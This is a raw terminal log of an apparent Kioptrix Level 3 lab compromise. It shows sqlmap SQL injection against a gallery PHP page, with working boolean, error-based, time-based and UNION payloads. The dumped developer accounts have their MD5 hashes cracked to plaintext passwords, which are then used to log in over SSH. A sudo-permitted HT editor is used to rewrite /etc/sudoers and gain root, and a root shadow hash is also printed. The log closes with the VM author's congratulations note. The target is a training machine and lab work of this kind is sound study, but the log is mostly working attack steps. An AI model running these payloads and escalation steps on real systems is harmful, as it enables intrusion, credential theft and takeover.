[04:08:55] [INFO] fetching tables for database: 'gallery'
[04:08:55] [INFO] the SQL query used returns 7 entries
[04:08:56] [INFO] retrieved: dev_accounts
[04:08:56] [INFO] retrieved: gallarific_comments
[04:08:56] [INFO] retrieved: gallarific_galleries
[04:08:56] [INFO] retrieved: gallarific_photos
[04:08:56] [INFO] retrieved: gallarific_settings
[04:08:56] [INFO] retrieved: gallarific_stats
[04:08:56] [INFO] retrieved: gallarific_users
Database: gallery                                                                                  
[7 tables]
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[04:08:56] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[04:08:56] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 04:08:56

sqlmap -u "http://kioptrix3.com/gallery/gallery.php?id=1" -p id -T dev_accounts --dump
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-201606170a89}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 03:32:50

[03:32:50] [INFO] testing connection to the target URL
[03:32:51] [INFO] heuristics detected web page charset 'ISO-8859-2'
[03:32:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[03:32:51] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[03:32:51] [INFO] testing if the target URL is stable
[03:32:52] [INFO] target URL is stable
[03:32:52] [INFO] heuristics detected web page charset 'ascii'
[03:32:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[03:32:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[03:32:52] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[03:33:11] [WARNING] reflective value(s) found and filtering out
[03:33:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[03:33:14] [INFO] GET parameter 'id' seems to be 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)' injectable
[03:33:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[03:33:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' injectable
[03:33:14] [INFO] testing 'MySQL inline queries'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[03:33:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[03:33:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[03:33:14] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[03:33:24] [INFO] GET parameter 'id' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
[03:33:24] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[03:33:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[03:33:25] [INFO] target URL appears to be UNION injectable with 6 columns
[03:33:25] [WARNING] combined UNION/error-based SQL injection case found on column 2. sqlmap will try to find another column with better characteristics
[03:33:25] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
[03:33:25] [WARNING] in OR boolean-based injections, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 142 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: id=-9800 OR 6056=6056#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=1 AND (SELECT 1889 FROM(SELECT COUNT(*),CONCAT(0x716a767a71,(SELECT (ELT(1889=1889,1))),0x71766a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))ZmZi)

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: id=1 UNION ALL SELECT CONCAT(0x716a767a71,0x53636269564f6f6c6b59774151557a6b697471716664654755694a584468475268497a624f554d61,0x71766a6b71),NULL,NULL,NULL,NULL,NULL-- -
---
[03:33:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
[03:33:43] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[03:33:43] [INFO] fetching current database
[03:33:43] [INFO] fetching columns for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 3 entries
[03:33:43] [INFO] the SQL query used returns 3 entries                      
[03:33:43] [INFO] retrieved: id
[03:33:43] [INFO] retrieved: int(10)
[03:33:43] [INFO] retrieved: username
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] retrieved: password
[03:33:43] [INFO] retrieved: varchar(50)
[03:33:43] [INFO] fetching entries for table 'dev_accounts' in database 'gallery'
[03:33:43] [INFO] the SQL query used returns 2 entries
[03:33:44] [INFO] retrieved: "1","0d3eccfb887aabd50f243b3f155c0f85","dreg"
[03:33:44] [WARNING] automatically patching output having last char trimmed
[03:33:44] [INFO] retrieved: "2","5badcaf789d3d1d09794d8f021f40f0e","loneferret"
[03:33:44] [INFO] analyzing table dump for possible password hashes          
[03:33:44] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to crack them via a dictionary-based attack? [Y/n/q]
[03:33:56] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> /usr/share/wordlists/rockyou.txt.gz
[03:34:19] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[03:34:26] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[03:34:26] [INFO] starting 2 processes
[03:34:27] [INFO] cracked password 'Mast3r' for user 'dreg'                  
[03:34:30] [INFO] cracked password 'starwars' for user 'loneferret'          
[03:34:31] [INFO] postprocessing table dump                                  
Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+

[03:34:31] [INFO] table 'gallery.dev_accounts' dumped to CSV file '/root/.sqlmap/output/kioptrix3.com/dump/gallery/dev_accounts.csv'
[03:34:31] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 21 times
[03:34:31] [INFO] fetched data logged to text files under '/root/.sqlmap/output/kioptrix3.com'

[*] shutting down at 03:34:31

ssh loneferret@kioptrix3.com
loneferret@kioptrix3.com's password: 
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
Last login: Sat Apr 16 08:51:58 2011 from 192.168.1.106
loneferret@Kioptrix3:~$

sudo su
[sudo] password for loneferret: 
Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3.

export TERM=xterm
sudo ht

Shadow:
root:$1$QAKvVJey$6rRkAMGKq1u62yfDaenUr1:15082:0:99999:7::: 

Edit sudoers
# User privilege specification
│root    ALL=(ALL) ALL    
│loneferret ALL=(ALL) ALL

loneferret@Kioptrix3:/usr/local/bin$ sudo ht /etc/sudoers
loneferret@Kioptrix3:/usr/local/bin$ sudo su
[sudo] password for loneferret: 
root@Kioptrix3:/usr/local/bin# whoami
root
root@Kioptrix3:/usr/local/bin#


root@Kioptrix3:/usr/local/bin# cd /root
root@Kioptrix3:~# ls
Congrats.txt  ht-2.0.18
root@Kioptrix3:~# cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.

Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone. 
Difficulty is relative, keep that in mind.

The object is to learn, do some research and have a little (legal)
fun in the process.


I hope you enjoyed this third challenge.

Steven McElrea
aka loneferret
http://www.kioptrix.com


Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.

Main page CMS: 
http://www.lotuscms.org

Gallery application: 
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/

The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/


Also, all pictures were taken from Google Images, so being part of the
public domain I used them.


Best Regards,
Yuriy Stanchev/URIX